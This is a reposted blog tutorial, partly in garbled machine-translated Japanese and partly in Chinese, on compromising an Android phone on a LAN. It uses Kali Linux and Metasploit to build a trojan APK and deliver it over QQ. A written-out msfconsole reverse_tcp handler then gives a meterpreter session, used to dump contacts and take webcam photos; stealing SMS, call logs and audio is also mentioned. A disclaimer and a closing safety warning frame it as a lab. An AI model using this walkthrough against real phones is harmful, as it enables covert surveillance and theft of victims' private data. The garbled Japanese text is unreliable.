侵入テスト-Kali侵入LAN携帯電話

序文

厳粛な声明:この記事は、技術的な議論と共有に制限されている厳密に違法な手段のために禁止されています。

この記事の目的:使用する方法を示しKali Linux、システムMetasploitのリモートコントロールトロイの木馬を生成し、そのようなソフトウェアのインストールやアンインストールなどのデータの読み出し、オーディオ盗聴、アクセス場所、被害者に携帯電話を有効に、ローカル・エリア・ネットワーク内のAndroid携帯電話に感染するフレームワークを侵入テストを。

環境説明

機械 IPアドレス
Win10物理ホスト 192.168.0.105
カーリー仮想マシン 192.168.0.199
名誉8テスト電話 192.168.0.107

Win10ホストと携帯電話がVMware社に設置WIFI、カリ仮想マシンと接続する必要があり、ブリッジモードは、同じセグメント内の携帯電話内の物理ホストとそのIPアドレスが、小さなローカルエリアネットワークを形成するように構成されてもよいです。

仮想マシンのIPとネットワークを設定する方法の、別のブログ記事をご覧ください浸透-Kali仮想マシンをテスト

攻撃する準備ができて

トロイの木馬ジェネレータ

:1、カリ確認仮想マシンへの第1の点ナンセンスがIPアドレス構成、前記
ここに画像を挿入説明
2、端末カリカリ仮想マシンの次のコマンドを入力/rootトロイの木馬ファイルパスを生成します520.apk
ここに画像を挿入説明

トランスミッショントロイの木馬

リモコントロイの木馬ファイルが生成されますが、どのように仮想マシンの転送カリからWin10物理ホストとさらに伝送に被害者の携帯電話にされてきましたか?

1、リモート接続XshellツールSFTPプロトコルは、新しいファイル転送セッションを、次のとおりです。
ここに画像を挿入説明

:カーリーは、リモートホスト尻ローカルフォルダで構成されながら、2、デフォルトのホスト10は、ファイルストレージパス勝利を転送するために
ここに画像を挿入説明
、3のログインにカーリーホストアカウントとパスワードを入力し、接続に成功した後、コマンドを使用get 520.apkカーリーホストからトロイの木馬をダウンロードしますローカルフォルダへのファイルD:\Code:で、
ここに画像を挿入説明次のファイルが正常にダウンロードされているかどうかを確認するために、ローカルフォルダ内の4、10勝ホスト:
ここに画像を挿入説明

トロイの木馬をインストールします。

1、再废话一下,查看并确认华为测试手机的IP地址与 Kali 虚拟机、Win 10主机在同一网段内:
ここに画像を挿入説明

2、在 Kali 虚拟机里查看能否连通手机(这是后续攻击成功的基础):
ここに画像を挿入説明
3、在 Win 10 主机打开QQ程序,向华为手机发送木马文件并安装(这个就不用演示了吧…),安装后如下:
ここに画像を挿入説明

开始攻击

MSF监听

Kali 终端依次执行以下命令:

msfconsole                //启动msfconsole
use exploit/multi/handler //加载模块
set payload android/meterpreter/reverse_tcp //选择Payload
set lhost 192.168.0.199  //这里的地址设置成我们刚才生成木马的IP地址
set lport 9999           //这里的端口设置成刚才我们生成木马所监听的端口
exploit                  //开始执行漏洞,开始监听,等待手机上线

1、在 Kali 终端输入msfconsole命令启动Metasploit框架:
ここに画像を挿入説明
2、依次以下执行命令加载攻击模块、选择Payload、设置本地监听主机的IP和端口:
ここに画像を挿入説明
3、执行命令exploit,开始执行攻击程序,进入监听状态,等待目标手机上线(用户点击木马程序):
ここに画像を挿入説明
4、此时手动点击刚才手机中安装的MainActivity程序图标(没有界面),则可成功建立攻击会话:
ここに画像を挿入説明
5、此时输入help命令可查看具体的攻击命令和描述,后面将选择几个进行演示:
ここに画像を挿入説明

命令行执行

成功建立攻击会话后可以对受害者手机进行像Linux主机shell一样对手机进行命令执行操作:
ここに画像を挿入説明

通讯录下载

1、在攻击会话中执行dump_contacts命令导出受害者手机通讯录里的信息到 Kali 虚拟机/root路径下:
ここに画像を挿入説明
2、在虚拟机中查看一下导出来的通讯录文件:
ここに画像を挿入説明

3、同理可导出受害者手机中的短信记录、通话记录……但是此手机没有插手机卡(穷……),故此处不做演示了。

摄像机拍摄

在攻击会话中执行命令webcam_snap ,可开启受害者的摄像头自动拍摄一张照片并保存到Kali 虚拟机中:
ここに画像を挿入説明同理还可以非法调用受害者手机的录音功能、屏幕截图功能……

この時点で、システムは、このカーリーは、リモート、プレゼンテーションLANのAndroid携帯電話のトロイの木馬攻撃の終了を制御する他の読者は、自己の使用することができます興味を持って運営されている攻撃発生helpの経験に攻撃コマンドの説明指定されたコマンドを。

注意:トロイの木馬プログラムが攻撃を偽装しますグラフィカルなインターフェイス、実世界の環境のプレゼンテーションを偽装しませんが、私たちは、未知のソフトウェアのセキュリティをインストールしないでください連想させる通常のソフトウェアを、取り、そして容易に接続していません公共のWIFI、自社の機器をローカルエリアネットワークをセットアップする攻撃にさらされているように......

公開された126元の記事 ・が 98のように勝っ ビュー100,000 +

おすすめ

転載: blog.csdn.net/weixin_39190897/article/details/104463705